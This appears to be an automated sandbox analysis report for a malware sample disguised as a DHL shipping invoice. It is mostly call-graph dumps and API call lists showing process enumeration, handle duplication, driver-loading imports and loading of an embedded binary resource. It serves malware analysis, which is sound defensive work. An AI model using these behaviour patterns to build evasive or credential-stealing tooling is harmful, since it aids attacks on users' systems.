39927 44df00 ??3@YAXPAX 39925->39927 39928 44df17 39926->39928 39929 44df10 ??3@YAXPAX 39926->39929 39927->39926 39930 44df27 39928->39930 39931 44df20 ??3@YAXPAX 39928->39931 39929->39928 39932 44df37 39930->39932 39933 44df30 ??3@YAXPAX 39930->39933 39931->39930 39933->39932 39934 4148b6 FindResourceW 39935 4148f9 39934->39935 39936 4148cf SizeofResource 39934->39936 39936->39935 39937 4148e0 LoadResource 39936->39937 39937->39935 39938 4148ee LockResource 39937->39938 39938->39935 39939 441b3f 39949 43a9f6 39939->39949 39941 441b61 40122 4386af memset 39941->40122 39943 44189a 39944 442bd4 39943->39944 39945 4418e2 39943->39945 39946 4418ea 39944->39946 40124 441409 memset 39944->40124 39945->39946 40123 4414a9 12 API calls 39945->40123 39950 43aa20 39949->39950 39951 43aadf 39949->39951 39950->39951 39952 43aa34 memset 39950->39952 39951->39941 39953 43aa56 39952->39953 39954 43aa4d 39952->39954 40125 43a6e7 39953->40125 40133 42c02e memset 39954->40133 39959 43aad3 40135 4169a7 11 API calls 39959->40135 39960 43aaae 39960->39951 39960->39959 39975 43aae5 39960->39975 39961 43ac18 39964 43ac47 39961->39964 40137 42bbd5 memcpy memcpy memcpy memset memcpy 39961->40137 39965 43aca8 39964->39965 40138 438eed 16 API calls 39964->40138 39969 43acd5 39965->39969 40140 4233ae 11 API calls 39965->40140 39968 43ac87 40139 4233c5 16 API calls 39968->40139 40141 423426 11 API calls 39969->40141 39973 43ace1 40142 439811 163 API calls 39973->40142 39974 43a9f6 161 API calls 39974->39975 39975->39951 39975->39961 39975->39974 40136 439bbb 22 API calls 39975->40136 39977 43acfd 39982 43ad2c 39977->39982 40143 438eed 16 API calls 39977->40143 39979 43ad19 40144 4233c5 16 API calls 39979->40144 39981 43ad58 40145 44081d 163 API calls 39981->40145 39982->39981 39985 43add9 39982->39985 40149 423426 11 API calls 39985->40149 39986 43ae3a memset 39987 43ae73 39986->39987 40150 42e1c0 147 API calls 39987->40150 39988 43adab 40147 438c4e 163 API calls 39988->40147 39989 43ad6c 39989->39951 39989->39988 40146 42370b memset memcpy memset 39989->40146 39993 43adcc 40148 440f84 12 API calls 39993->40148 39994 43ae96 40151 42e1c0 147 API calls 39994->40151 39997 43aea8 39998 43aec1 39997->39998 40152 42e199 147 API calls 39997->40152 39999 43af00 39998->39999 40153 42e1c0 147 API calls 39998->40153 39999->39951 40003 43af1a 39999->40003 40004 43b3d9 39999->40004 40154 438eed 16 API calls 40003->40154 40009 43b3f6 40004->40009 40014 43b4c8 40004->40014 40005 43b60f 40005->39951 40213 4393a5 17 API calls 40005->40213 40008 43af2f 40155 4233c5 16 API calls 40008->40155 40195 432878 12 API calls 40009->40195 40011 43af51 40156 423426 11 API calls 40011->40156 40013 43b4f2 40202 43a76c 21 API calls 40013->40202 40014->40013 40201 42bbd5 memcpy memcpy memcpy memset memcpy 40014->40201 40016 43af7d 40157 423426 11 API calls 40016->40157 40020 43b529 40203 44081d 163 API calls 40020->40203 40021 43b462 40197 423330 11 API calls 40021->40197 40022 43af94 40158 423330 11 API calls 40022->40158 40026 43afca 40159 423330 11 API calls 40026->40159 40027 43b47e 40031 43b497 40027->40031 40198 42374a memcpy memset memcpy memcpy memcpy 40027->40198 40028 43b544 40032 43b55c 40028->40032 40204 42c02e memset 40028->40204 40029 43b428 40029->40021 40196 432b60 16 API calls 40029->40196 40199 4233ae 11 API calls 40031->40199 40205 43a87a 163 API calls 40032->40205 40034 43afdb 40160 4233ae 11 API calls 40034->40160 40039 43b56c 40043 43b58a 40039->40043 40206 423330 11 API calls 40039->40206 40040 43b4b1 40200 423399 11 API calls 40040->40200 40042 43afee 40161 44081d 163 API calls 40042->40161 40207 440f84 12 API calls 40043->40207 40044 43b4c1 40209 42db80 163 API calls 40044->40209 40049 43b592 40208 43a82f 16 API calls 40049->40208 40052 43b5b4 40210 438c4e 163 API calls 40052->40210 40053 43b01f 40058 43b1ef 40053->40058 40170 423330 11 API calls 40053->40170 40171 42d71d 163 API calls 40053->40171 40055 43b005 40055->39951 40055->40053 40162 42d836 163 API calls 40055->40162 40056 43b5cf 40211 42c02e memset 40056->40211 40172 4233c5 16 API calls 40058->40172 40061 43b212 40173 423330 11 API calls 40061->40173 40063 43b087 40163 4233ae 11 API calls 40063->40163 40064 43add4 40064->40005 40212 438f86 16 API calls 40064->40212 40067 43b22a 40174 42ccb5 11 API calls 40067->40174 40070 43b23f 40175 4233ae 11 API calls 40070->40175 40071 43b10f 40166 423330 11 API calls 40071->40166 40073 43b257 40176 4233ae 11 API calls 40073->40176 40077 43b129 40167 4233ae 11 API calls 40077->40167 40078 43b26e 40177 4233ae 11 API calls 40078->40177 40081 43b09a 40081->40071 40164 42cc15 19 API calls 40081->40164 40165 4233ae 11 API calls 40081->40165 40082 43b282 40178 43a87a 163 API calls 40082->40178 40084 43b13c 40168 440f84 12 API calls 40084->40168 40086 43b29d 40179 423330 11 API calls 40086->40179 40089 43b15f 40169 4233ae 11 API calls 40089->40169 40090 43b2af 40091 43b2b8 40090->40091 40092 43b2ce 40090->40092 40180 4233ae 11 API calls 40091->40180 40181 440f84 12 API calls 40092->40181 40096 43b2c9 40183 4233ae 11 API calls 40096->40183 40097 43b2da 40182 42370b memset memcpy memset 40097->40182 40100 43b2f9 40184 423330 11 API calls 40100->40184 40102 43b30b 40185 423330 11 API calls 40102->40185 40104 43b325 40186 423399 11 API calls 40104->40186 40106 43b332 40187 4233ae 11 API calls 40106->40187 40108 43b354 40188 423399 11 API calls 40108->40188 40110 43b364 40189 43a82f 16 API calls 40110->40189 40112 43b370 40190 42db80 163 API calls 40112->40190 40114 43b380 40191 438c4e 163 API calls 40114->40191 40116 43b39e 40192 423399 11 API calls 40116->40192 40118 43b3ae 40193 43a76c 21 API calls 40118->40193 40120 43b3c3 40194 423399 11 API calls 40120->40194 40122->39943 40123->39946 40124->39944 40126 43a6f5 40125->40126 40127 43a765 40125->40127 40126->40127 40214 42a115 40126->40214 40127->39951 40134 4397fd memset 40127->40134 40131 43a73d 40131->40127 40132 42a115 147 API calls 40131->40132 40132->40127 40133->39953 40134->39960 40135->39951 40136->39975 40137->39964 40138->39968 40139->39965 40140->39969 40141->39973 40142->39977 40143->39979 40144->39982 40145->39989 40146->39988 40147->39993 40148->40064 40149->39986 40150->39994 40151->39997 40152->39998 40153->39998 40154->40008 40155->40011 40156->40016 40157->40022 40158->40026 40159->40034 40160->40042 40161->40055 40162->40063 40163->40081 40164->40081 40165->40081 40166->40077 40167->40084 40168->40089 40169->40053 40170->40053 40171->40053 40172->40061 40173->40067 40174->40070 40175->40073 40176->40078 40177->40082 40178->40086 40179->40090 40180->40096 40181->40097 40182->40096 40183->40100 40184->40102 40185->40104 40186->40106 40187->40108 40188->40110 40189->40112 40190->40114 40191->40116 40192->40118 40193->40120 40194->40064 40195->40029 40196->40021 40197->40027 40198->40031 40199->40040 40200->40044 40201->40013 40202->40020 40203->40028 40204->40032 40205->40039 40206->40043 40207->40049 40208->40044 40209->40052 40210->40056 40211->40064 40212->40005 40213->39951 40215 42a175 40214->40215 40217 42a122 40214->40217 40215->40127 40220 42b13b 147 API calls 40215->40220 40217->40215 40218 42a115 147 API calls 40217->40218 40221 43a174 40217->40221 40245 42a0a8 147 API calls 40217->40245 40218->40217 40220->40131 40235 43a196 40221->40235 40236 43a19e 40221->40236 40222 43a306 40222->40235 40261 4388c4 14 API calls 40222->40261 40225 42a115 147 API calls 40225->40236 40226 415a91 memset 40226->40236 40227 43a642 40227->40235 40265 4169a7 11 API calls 40227->40265 40231 43a635 40264 42c02e memset 40231->40264 40235->40217 40236->40222 40236->40225 40236->40226 40236->40235 40246 42ff8c 40236->40246 40254 4165ff 40236->40254 40257 439504 13 API calls 40236->40257 40258 4312d0 147 API calls 40236->40258 40259 42be4c memcpy memcpy memcpy memset memcpy 40236->40259 40260 43a121 11 API calls 40236->40260 40238 4169a7 11 API calls 40239 43a325 40238->40239 40239->40227 40239->40231 40239->40235 40239->40238 40240 42b5b5 memset memcpy 40239->40240 40241 42bf4c 14 API calls 40239->40241 40244 4165ff 11 API calls 40239->40244 40262 42b63e 14 API calls 40239->40262 40263 42bfcf memcpy 40239->40263 40240->40239 40241->40239 40244->40239 40245->40217 40266 43817e 40246->40266 40248 42ff99 40249 42ffe3 40248->40249 40250 42ffd0 40248->40250 40253 42ff9d 40248->40253 40271 4169a7 11 API calls 40249->40271 40270 4169a7 11 API calls 40250->40270 40253->40236 40255 4165a0 11 API calls 40254->40255 40256 41660d 40255->40256 40256->40236 40257->40236 40258->40236 40259->40236 40260->40236 40261->40239 40262->40239 40263->40239 40264->40227 40265->40235 40267 438187 40266->40267 40269 438192 40266->40269 40272 4380f6 40267->40272 40269->40248 40270->40253 40271->40253 40274 43811f 40272->40274 40273 438164 40273->40269 40274->40273 40276 4300e8 3 API calls 40274->40276 40277 437e5e 40274->40277 40276->40274 40300 437d3c 40277->40300 40279 437eb3 40279->40274 40280 437ea9 40280->40279 40285 437f22 40280->40285 40315 41f432 40280->40315 40283 437f06 40362 415c56 11 API calls 40283->40362 40287 432d4e 3 API calls 40285->40287 40288 437f7f 40285->40288 40286 437f95 40363 415c56 11 API calls 40286->40363 40287->40288 40288->40286 40289 43802b 40288->40289 40291 4165ff 11 API calls 40289->40291 40292 438054 40291->40292 40326 437371 40292->40326 40295 43806b 40296 438094 40295->40296 40364 42f50e 138 API calls 40295->40364 40298 437fa3 40296->40298 40299 4300e8 3 API calls 40296->40299 40298->40279 40365 41f638 104 API calls 40298->40365 40299->40298 40301 437d69 40300->40301 40303 437d80 40300->40303 40366 437ccb 11 API calls 40301->40366 40304 437d76 40303->40304 40305 437da3 40303->40305 40307 437d90 40303->40307 40304->40280 40308 438460 134 API calls 40305->40308 40307->40304 40370 437ccb 11 API calls 40307->40370 40311 437dcb 40308->40311 40309 437de8 40369 424f26 123 API calls 40309->40369 40311->40309 40367 444283 13 API calls 40311->40367 40313 437dfc 40368 437ccb 11 API calls 40313->40368 40316 41f54d 40315->40316 40319 41f44f 40315->40319 40317 41f466 40316->40317 40400 41c635 memset memset 40316->40400 40317->40283 40317->40285 40319->40317 40324 41f50b 40319->40324 40371 41f1a5 40319->40371 40396 41c06f memcmp 40319->40396 40397 41f3b1 90 API calls 40319->40397 40398 41f398 86 API calls 40319->40398 40324->40316 40324->40317 40399 41c295 86 API calls 40324->40399 40327 41703f 11 API calls 40326->40327 40328 437399 40327->40328 40329 43739d 40328->40329 40331 4373ac 40328->40331 40401 4446ea 11 API calls 40329->40401 40332 416935 16 API calls 40331->40332 40342 4373ca 40332->40342 40333 438460 134 API calls 40333->40342 40334 4375bc 40336 415c7d 16 API calls 40334->40336 40337 4375d2 40336->40337 40339 4442e6 11 API calls 40337->40339 40360 4373a7 40337->40360 40338 4251c4 137 API calls 40338->40342 40340 4375e2 40339->40340 40340->40360 40409 444283 13 API calls 40340->40409 40342->40333 40342->40338 40344 415a91 memset 40342->40344 40347 43758f 40342->40347 40355 437584 40342->40355 40361 437d3c 135 API calls 40342->40361 40402 425433 13 API calls 40342->40402 40403 425413 17 API calls 40342->40403 40404 42533e 16 API calls 40342->40404 40405 42538f 16 API calls 40342->40405 40406 42453e 123 API calls 40342->40406 40344->40342 40345 4375f4 40353 437620 40345->40353 40354 43760b 40345->40354 40407 42453e 123 API calls 40347->40407 40350 43759f 40352 416935 16 API calls 40350->40352 40352->40355 40357 416935 16 API calls 40353->40357 40410 444283 13 API calls 40354->40410 40355->40334 40408 42453e 123 API calls 40355->40408 40357->40360 40359 437612 memcpy 40359->40360 40360->40295 40361->40342 40362->40279 40363->40298 40364->40296 40365->40279 40366->40304 40367->40313 40368->40309 40369->40304 40370->40304 40372 41bc3b 101 API calls 40371->40372 40373 41f1b4 40372->40373 40374 41edad 86 API calls 40373->40374 40381 41f282 40373->40381 40375 41f1cb 40374->40375 40376 41f1f5 memcmp 40375->40376 40377 41f20e 40375->40377 40375->40381 40376->40377 40378 41f21b memcmp 40377->40378 40377->40381 40379 41f326 40378->40379 40382 41f23d 40378->40382 40380 41ee6b 86 API calls 40379->40380 40379->40381 40380->40381 40381->40319 40382->40379 40383 41f28e memcmp 40382->40383 40385 41c8df 56 API calls 40382->40385 40383->40379 40384 41f2a9 40383->40384 40384->40379 40387 41f308 40384->40387 40388 41f2d8 40384->40388 40386 41f269 40385->40386 40386->40379 40389 41f287 40386->40389 40390 41f27a 40386->40390 40387->40379 40394 4446ce 11 API calls 40387->40394 40391 41ee6b 86 API calls 40388->40391 40389->40383 40392 41ee6b 86 API calls 40390->40392 40393 41f2e0 40391->40393 40392->40381 40395 41b1ca memset 40393->40395 40394->40379 40395->40381 40396->40319 40397->40319 40398->40319 40399->40316 40400->40317 40401->40360 40402->40342 40403->40342 40404->40342 40405->40342 40406->40342 40407->40350 40408->40334 40409->40345 40410->40359 40411 441819 40414 430737 40411->40414 40413 441825 40415 430756 40414->40415 40427 43076d 40414->40427 40416 430774 40415->40416 40417 43075f 40415->40417 40428 43034a 40416->40428 40439 4169a7 11 API calls 40417->40439 40420 4307ce 40421 430819 memset 40420->40421 40432 415b2c 40420->40432 40421->40427 40422 43077e 40422->40420 40425 4307fa 40422->40425 40422->40427 40424 4307e9 40424->40421 40424->40427 40440 4169a7 11 API calls 40425->40440 40427->40413 40429 43034e 40428->40429 40431 430359 40428->40431 40441 415c23 memcpy 40429->40441 40431->40422 40433 415b42 40432->40433 40436 415b46 40432->40436 40434 415b94 40433->40434 40433->40436 40437 415b5a 40433->40437 40435 4438b5 10 API calls 40434->40435 40435->40436 40436->40424 40437->40436 40438 415b79 memcpy 40437->40438 40438->40436 40439->40427 40440->40427 40441->40431 40442 41493c EnumResourceNamesW 40443 441a5b 40444 441a66 40443->40444 40447 430937 40444->40447 40448 430956 40447->40448 40449 430977 40447->40449 40448->40449 40451 430969 40448->40451 40455 43097e 40448->40455 40525 42c02e memset 40449->40525 40524 4169a7 11 API calls 40451->40524 40452 430a79 40455->40449 40456 431a7b 40455->40456 40457 431aa3 40456->40457 40492 431b2e 40456->40492 40459 43817e 139 API calls 40457->40459 40457->40492 40462 431ab6 40459->40462 40460 432116 40544 4325ad memset 40460->40544 40467 431b15 40462->40467 40462->40492 40526 43041c 12 API calls 40462->40526 40463 432122 40463->40449 40465 431ad5 40466 431b04 40465->40466 40465->40492 40527 42faf4 12 API calls 40465->40527 40471 42ff8c 139 API calls 40466->40471 40468 431baa 40467->40468 40469 431b7c memcmp 40467->40469 40467->40492 40472 431bb0 40468->40472 40473 431bcb 40468->40473 40469->40468 40488 431b95 40469->40488 40471->40467 40529 4169a7 11 API calls 40472->40529 40476 431bd1 40473->40476 40477 431c45 40473->40477 40478 43034a memcpy 40476->40478 40480 4165ff 11 API calls 40477->40480 40479 431bdc 40478->40479 40479->40492 40530 430468 11 API calls 40479->40530 40482 431c65 40480->40482 40483 431cba 40482->40483 40482->40492 40531 42bf4c 14 API calls 40482->40531 40486 415a91 memset 40483->40486 40485 431bef 40485->40482 40485->40488 40485->40492 40489 431d17 40486->40489 40487 431ca1 40487->40492 40532 42bfcf memcpy 40487->40532 40488->40492 40528 4169a7 11 API calls 40488->40528 40490 431d27 memcpy 40489->40490 40489->40492 40499 431da8 40490->40499 40506 431e97 40490->40506 40543 42c02e memset 40492->40543 40493 431eb8 40534 4169a7 11 API calls 40493->40534 40494 431f3c 40496 431fc3 40494->40496 40497 431f45 40494->40497 40537 4397fd memset 40496->40537 40535 4172c8 memset 40497->40535 40499->40492 40499->40493 40501 431e12 memcpy 40499->40501 40499->40506 40533 430af5 16 API calls 40499->40533 40500 431fd4 40500->40492 40538 4328e4 12 API calls 40500->40538 40501->40499 40505 431feb 40539 4233ae 11 API calls 40505->40539 40506->40494 40509 431f6a 40506->40509 40508 431ffc 40510 43202e 40508->40510 40514 4165ff 11 API calls 40508->40514 40509->40492 40536 4169a7 11 API calls 40509->40536 40540 42fe8b 22 API calls 40510->40540 40513 432057 40513->40492 40541 431917 23 API calls 40513->40541 40514->40510 40516 432079 40542 430b5d 11 API calls 40516->40542 40524->40449 40525->40452 40526->40465 40527->40466 40528->40492 40529->40492 40530->40485 40531->40487 40532->40483 40533->40499 40534->40492 40535->40492 40536->40492 40537->40500 40538->40505 40539->40508 40540->40513 40541->40516 40543->40460 40544->40463

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 CloseHandle GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 354 40de5a 351->354 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 356 40de5d-40de63 354->356 358 40de74-40de78 356->358 359 40de65-40de6c 356->359 358->352 358->356 359->358 361 40de6e-40de71 359->361 361->358 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 373 40dff8-40dffb 370->373 374 40defd-40df02 370->374 371->370 372 40ded0-40dee1 _wcsicmp 371->372 372->370 375 40dffd-40e006 372->375 373->363 373->375 376 40df08 374->376 377 40dfef-40dff2 CloseHandle 374->377 375->362 375->363 378 40df0b-40df10 376->378 377->373 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 381 40df23-40df4a GetCurrentProcess DuplicateHandle 379->381 380->378 382 40dfd1-40dfd3 380->382 381->380 383 40df4c-40df76 memset call 41352f 381->383 382->377 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->377
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040DDAD
                                                                                                                                                                                                                                        • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                                                                                                                                                                                                      • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                                                                                                                                                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                                                                                                                                                        • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                                                                                                                                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                                                                                                                                                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                                                                                                                                                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                                                                                                                                                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                                                                                                                                                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                                                                                                                                                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                                                                                                                                                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                                                                                                                                                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                                                                                                                                                                      • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                                                                                                                                      • CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 0040DEC5
                                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 0040DED8
                                                                                                                                                                                                                                      • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                                                                                                                                                                                                      • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040DF5F
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 0040DFB2
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressProc$Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                                                                                                                                                                                                                                      • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                                                                                                                                                                                                      • API String ID: 708747863-3398334509
                                                                                                                                                                                                                                      • Opcode ID: 5cab624b8928eaf00a06d38b2ee3d6eb31f92f98f3d88623932f7a2009947366
                                                                                                                                                                                                                                      • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5cab624b8928eaf00a06d38b2ee3d6eb31f92f98f3d88623932f7a2009947366
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 635 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 638 413f00-413f11 Process32NextW 635->638 639 413da5-413ded OpenProcess 638->639 640 413f17-413f24 CloseHandle 638->640 641 413eb0-413eb5 639->641 642 413df3-413e26 memset call 413f27 639->642 641->638 643 413eb7-413ebd 641->643 650 413e79-413e9d call 413959 call 413ca4 642->650 651 413e28-413e35 642->651 645 413ec8-413eda call 4099f4 643->645 646 413ebf-413ec6 free 643->646 648 413edb-413ee2 645->648 646->648 656 413ee4 648->656 657 413ee7-413efe 648->657 662 413ea2-413eae CloseHandle 650->662 654 413e61-413e68 651->654 655 413e37-413e44 GetModuleHandleW 651->655 654->650 660 413e6a-413e76 654->660 655->654 659 413e46-413e5c GetProcAddress 655->659 656->657 657->638 659->654 660->650 662->641
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 00413D6A
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00413D7F
                                                                                                                                                                                                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                                                                                                                                                                                                      • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00413E07
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                                                                                                                                                                                                                      • free.MSVCRT ref: 00413EC1
                                                                                                                                                                                                                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Handle$CloseProcess32freememset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                                                                                                                                                                                                                      • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                                                                                                                                                                      • API String ID: 1344430650-1740548384
                                                                                                                                                                                                                                      • Opcode ID: 7edb3ed668d67efb41ddc3a99b3dcc2d3fa5e99a9f713289acc2c2ca3bb66fb8
                                                                                                                                                                                                                                      • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7edb3ed668d67efb41ddc3a99b3dcc2d3fa5e99a9f713289acc2c2ca3bb66fb8
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 754 40b58d-40b59e 755 40b5a4-40b5c0 GetModuleHandleW FindResourceW 754->755 756 40b62e-40b632 754->756 757 40b5c2-40b5ce LoadResource 755->757 758 40b5e7 755->758 757->758 759 40b5d0-40b5e5 SizeofResource LockResource 757->759 760 40b5e9-40b5eb 758->760 759->760 760->756 761 40b5ed-40b5ef 760->761 761->756 762 40b5f1-40b629 call 40afcf memcpy call 40b4d3 call 40b3c1 call 40b04b 761->762 762->756
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,?, AE,?,?,00411B78,?,General,?,00000000,00000001), ref: 0040B5A5
                                                                                                                                                                                                                                      • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                                                                                                                                                                                                                                      • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                                                                                                                                                                                      • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                                                                                                                                                                                      • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                                                                                                                                                                                      • String ID: AE$BIN
                                                                                                                                                                                                                                      • API String ID: 1668488027-3931574542
                                                                                                                                                                                                                                      • Opcode ID: 34e809506899ed03cb1dc36614dfe32cef5e62f1a3b34244b0efced66f6d4593
                                                                                                                                                                                                                                      • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 34e809506899ed03cb1dc36614dfe32cef5e62f1a3b34244b0efced66f6d4593
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                                                                                                                                                                                                      APIs
